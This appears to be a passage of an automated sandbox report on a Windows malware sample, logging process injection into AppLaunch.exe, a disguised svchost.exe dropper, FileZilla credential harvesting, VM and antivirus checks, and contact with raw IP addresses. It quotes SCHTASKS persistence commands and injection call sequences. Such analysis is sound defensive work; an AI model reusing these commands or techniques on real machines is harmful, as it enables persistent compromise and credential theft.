RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW Dec. 11, 2023, 7:15 p.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000008c0 key_handle: 0x000008c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Created a process named as a common system process (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2944 thread_handle: 0x000007a0 process_identifier: 2940 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006c8	1	1	0
ShellExecuteExW Dec. 11, 2023, 7:16 p.m.	show_type: 1 filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe	1	1	0

Terminates another process (13 events)

Time & API	Arguments	Status	Return
NtTerminateProcess Dec. 11, 2023, 7:15 p.m.	status_code: 0x00000005 process_identifier: 1952 process_handle: 0x0000006c		0
NtTerminateProcess Dec. 11, 2023, 7:15 p.m.	status_code: 0x00000005 process_identifier: 1952 process_handle: 0x0000006c	1	0
NtTerminateProcess Dec. 11, 2023, 7:15 p.m.	status_code: 0x00000005 process_identifier: 2080 process_handle: 0x00000070		0
NtTerminateProcess Dec. 11, 2023, 7:15 p.m.	status_code: 0x00000005 process_identifier: 2080 process_handle: 0x00000070	1	0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 1664 process_handle: 0x000007a8		0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 1664 process_handle: 0x000007a8	1	0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 3016 process_handle: 0x000007a8		0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 3016 process_handle: 0x000007a8	1	0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 2172 process_handle: 0x00000798		0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 2172 process_handle: 0x00000798	1	0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 2840 process_handle: 0x00000798		0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 2840 process_handle: 0x00000798		3221225738
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0xffffffff process_identifier: 1340 process_handle: 0x00000794		0

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	attrib +H "Installer.exe"
cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	main.bat /S
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Executes one or more WMI queries which can be used to identify virtual machines (2 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (2 events)

host	195.20.16.153
host	45.15.156.167

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 1952 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000006c		3221225496
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2080 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000070		3221225496
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000078	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Dec. 11, 2023, 7:15 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

Installer.exe tried to sleep 2728196 seconds, actually delayed analysis time by 2728196 seconds

Installs itself for autorun at Windows startup (4 events)

cmdline	SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline	"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5665" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Creates an executable file in a user folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\svchost.exe

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (9 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor
wmi	SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 1000 manipulating memory of non-child process 1952
Process injection	Process 1000 manipulating memory of non-child process 2080
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 1952 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000006c	3221225496	0
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2080 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000070	3221225496	0

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¼^¯à0À¬îß à@ À@ßSà^© H.textô¿ À `.rsrc^©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 2116 process_handle: 0x00000078	1	1
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: Ðð? base_address: 0x0043a000 process_identifier: 2116 process_handle: 0x00000078	1	1
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2116 process_handle: 0x00000078	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¼^¯à0À¬îß à@ À@ßSà^© H.textô¿ À `.rsrc^©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 2116 process_handle: 0x00000078	1	1	0

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Dec. 11, 2023, 7:15 p.m.	key_handle: 0x000008c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1000 called NtSetContextThread to modify thread in remote process 2116
NtSetContextThread Dec. 11, 2023, 7:15 p.m.	registers.eip: 2005598660 registers.esp: 2554036 registers.edi: 0 registers.eax: 4382702 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2116	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1000 resumed a thread in remote process 2116
Process injection	Process 3016 resumed a thread in remote process 1340
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2116	1	0	0
NtResumeThread Dec. 11, 2023, 7:16 p.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 1340	1	0	0

Tries to unhook Windows functions monitored by Cuckoo (1 event)

Time & API	Arguments	Status	Return	Repeated
__anomaly__ Dec. 11, 2023, 7:16 p.m.	tid: 2944 message: Encountered 65537 exceptions, quitting. subcategory: exception function_name:	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 89 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Dec. 11, 2023, 7:15 p.m.	thread_identifier: 1184 thread_handle: 0x00000068 process_identifier: 1952 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000006c	1	1
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000068	1	0
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 1952 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000006c		3221225496
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: base_address: 0x00000000 process_identifier: 1952 process_handle: 0x0000006c		0
CreateProcessInternalW Dec. 11, 2023, 7:15 p.m.	thread_identifier: 2084 thread_handle: 0x00000074 process_identifier: 2080 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000070	1	1
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000074	1	0
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2080 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000070		3221225496
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: base_address: 0x00000000 process_identifier: 2080 process_handle: 0x00000070		0
CreateProcessInternalW Dec. 11, 2023, 7:15 p.m.	thread_identifier: 2120 thread_handle: 0x0000007c process_identifier: 2116 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000078	1	1
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x0000007c	1	0
NtAllocateVirtualMemory Dec. 11, 2023, 7:15 p.m.	process_identifier: 2116 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000078	1	0
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¼^¯à0À¬îß à@ À@ßSà^© H.textô¿ À `.rsrc^©àªÂ@@.reloc l@B base_address: 0x00400000 process_identifier: 2116 process_handle: 0x00000078	1	1
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: base_address: 0x00402000 process_identifier: 2116 process_handle: 0x00000078	1	1
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: base_address: 0x0042e000 process_identifier: 2116 process_handle: 0x00000078	1	1
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: Ðð? base_address: 0x0043a000 process_identifier: 2116 process_handle: 0x00000078	1	1
WriteProcessMemory Dec. 11, 2023, 7:15 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2116 process_handle: 0x00000078	1	1
